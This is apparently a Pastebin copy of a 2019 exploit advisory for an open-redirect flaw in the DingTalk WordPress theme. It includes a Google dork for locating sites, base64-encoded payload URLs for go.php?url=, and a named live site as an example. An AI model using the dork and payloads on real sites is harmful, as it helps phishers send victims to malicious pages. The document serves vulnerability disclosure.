KingSkrupellos

WordPress 5.2.1 DingTalk Themes LTS 4.6 Open Redirection

May 24th, 2019
76
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 3.25 KB | None | 0 0
  1. ####################################################################
  2.  
  3. # Exploit Title : WordPress 5.2.1 DingTalk Themes LTS 4.6 Open Redirection
  4. # Author [ Discovered By ] : KingSkrupellos
  5. # Team : Cyberizm Digital Security Army
  6. # Date : 25/05/2019
  7. # Vendor Homepage : zmingcx.com - dingfen.net
  8. # Information Link : zmingcx.com/begin.html
  9. # WordPress Version : 5.2.1
  10. # Theme Version : LTS 4.6
  11. # Tested On : Windows and Linux
  12. # Category : WebApps
  13. # Exploit Risk : Medium
  14. # Google Dorks : inurl:/wp-content/themes/dingtalk/
  15. # Vulnerability Type : CWE-601 [ URL Redirection to Untrusted Site ('Open Redirect') ]
  16. # PacketStormSecurity : packetstormsecurity.com/files/authors/13968
  17. # CXSecurity : cxsecurity.com/author/KingSkrupellos/1/
  18. # Exploit4Arab : exploit4arab.org/author/351/KingSkrupellos
  19.  
  20. ####################################################################
  21.  
  22. # Impact :
  23. ***********
  24. WordPress DingTalk Themes accepts a user-controlled input that specifies
  25. a link to an external site, and uses that link in a Redirect. This simplifies phishing
  26. attacks. An http parameter may contain a URL value and could cause the web
  27. application to redirect the request to the specified URL. By modifying the URL
  28. value to a malicious site, an attacker may successfully launch a phishing scam and
  29. steal user credentials. Because the server name in the modified link is identical to the
  30. original site, phishing attempts have a more trustworthy appearance. Open redirect is a
  31. failure in that process that makes it possible for attackers to steer users to malicious
  32. websites. This vulnerability is used in phishing attacks to get users to visit malicious
  33. sites without realizing it. Web users often encounter redirection when they visit the
  34. Web site of a company whose name has been changed or which has been acquired by
  35. another company. Visiting unreal web page user's computer becomes affected
  36. by malware the task of which is to deceive the valid actor and steal his personal data.
  37.  
  38. ####################################################################
  39.  
  40. # Vulnerable File :
  41. *****************
  42. /go.php
  43.  
  44. # Vulnerable Parameters :
  45. ***********************
  46. ?url=
  47.  
  48. # Open Redirection Exploit :
  49. **************************
  50. /wp-content/themes/dingtalk/go.php?url=[BASE64 Encoded URL]
  51.  
  52. /wp-content/themes/dingtalk/go.php?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
  53.  
  54. Note : Convert any random desired redirection address into the Base64 Encoded Link.
  55.  
  56. Example 1 => aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8= stands for cxsecurity.com
  57.  
  58. Example 2 => aHR0cHM6Ly93d3cuY3liZXJpem0ub3JnLw== stands for cyberizm.org
  59.  
  60. Example 3 => aHR0cDovL2V4cGxvaXQ0YXJhYi5vcmcv stands for exploit4arab.org
  61.  
  62. Example 4 => aHR0cHM6Ly9wYWNrZXRzdG9ybXNlY3VyaXR5LmNvbS8= stands for packetstormsecurity.com
  63.  
  64. Useable Base64 Encoder - Decoder Links :
  65. base64decode.org
  66. base64encode.org
  67.  
  68. ####################################################################
  69.  
  70. # Example Vulnerable Sites :
  71. *************************
  72. [+] dingfen.net/wp-content/themes/dingtalk/go.php?url=aHR0cHM6Ly9jeHNlY3VyaXR5LmNvbS8=
  73.  
  74. ####################################################################
  75.  
  76. # Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team
  77.  
  78. ####################################################################
Add Comment
Please, Sign In to add comment